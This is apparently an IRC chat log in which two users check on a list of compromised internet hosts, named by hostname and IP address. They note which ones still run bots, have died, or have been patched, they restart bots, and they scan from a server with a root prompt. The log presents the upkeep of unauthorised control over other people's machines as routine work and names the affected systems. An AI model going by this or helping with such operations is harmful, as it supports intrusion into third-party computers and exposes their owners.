006-12-189-66.wo.cpe.charter-ne.com 66.189.12.6 --> up, bot running, but not on irc rezzie!loud@63.145.151.251 :k r0nn13!~Stargazer@152.94.16.11 :well, ill list only the ones dead rezzie!loud@63.145.151.251 :yep rezzie!loud@63.145.151.251 :also if theyre patched rezzie!loud@63.145.151.251 :so i can tag them as patched r0nn13!~Stargazer@152.94.16.11 :9) evrtwa1-ar3-131-130.biz.dsl.gtei.net 4.40.131.130 ---> this box is fucked, libs are gone, ps and ls doesn't work rezzie!loud@63.145.151.251 :ahh yeh rezzie!loud@63.145.151.251 :ehheh rezzie!loud@63.145.151.251 :i remember that one r0nn13!~Stargazer@152.94.16.11 :i just restarted magellan r0nn13!~Stargazer@152.94.16.11 :looked crashed r0nn13!~Stargazer@152.94.16.11 :btw, the BBB boxes, are dynamic ip's r0nn13!~Stargazer@152.94.16.11 :so the ones are down, are prolly coz they rebooted r0nn13!~Stargazer@152.94.16.11 :and ip changed rezzie!loud@63.145.151.251 :hrm rezzie!loud@63.145.151.251 :bbb is dynamic? rezzie!loud@63.145.151.251 :i thought bbb was static r0nn13!~Stargazer@152.94.16.11 :13) evrtwa1-ar3-131-130.biz.dsl.gtei.net 4.40.131.133 --> dead r0nn13!~Stargazer@152.94.16.11 :no, is not r0nn13!~Stargazer@152.94.16.11 :just lagged r0nn13!~Stargazer@152.94.16.11 :lol r0nn13!~Stargazer@152.94.16.11 :is the one with the stuff fucked rezzie!loud@63.145.151.251 :how do bbb sites last then? r0nn13!~Stargazer@152.94.16.11 :16) 193.136.100.73 193.136.100.73 ---> dead r0nn13!~Stargazer@152.94.16.11 :18) adsl-66-72-96-9.dsl.chcgil.ameritech.net 66.72.96.9 --> connection refused rezzie!loud@63.145.151.251 :hrm rezzie!loud@63.145.151.251 :that ip wasnt even in my list rezzie!loud@63.145.151.251 :66.75.96.192 rezzie!loud@63.145.151.251 :closest i have to that r0nn13!~Stargazer@152.94.16.11 :23) ts46-03-qdr1258.porch.wa.charter.com 66.190.234.234 --> DEAD r0nn13!~Stargazer@152.94.16.11 :25) evrtwa1-ar15-4-65-229-161.evrtwa1.dsl-verizon.net 4.65.229.161 --> DEAD r0nn13!~Stargazer@152.94.16.11 :restarting the bots that are gone seems to work pretty well rezzie!loud@63.145.151.251 :ehhe yeh r0nn13!~Stargazer@152.94.16.11 :ns1.proserver looks fucked up rezzie!loud@63.145.151.251 :im scanning from it rezzie!loud@63.145.151.251 :might be lagged rezzie!loud@63.145.151.251 :woops rezzie!loud@63.145.151.251 :heh rezzie!loud@63.145.151.251 :nvm r0nn13!~Stargazer@152.94.16.11 :that or k1m getting packeted again r0nn13!~Stargazer@152.94.16.11 :[root@ns1 x]# Connection disappeared, errno=0 r0nn13!~Stargazer@152.94.16.11 :seems ok now r0nn13!~Stargazer@152.94.16.11 :36) 4.46.105.70 lsanca1-ar16-4-46-105-070.lsanca1.dsl-verizon.net ---> DEAD r0nn13!~Stargazer@152.94.16.11 :38) 193.15.114.54 193.15.114.54 ---> DEAD r0nn13!~Stargazer@152.94.16.11 :proserveur.com went to hell again eh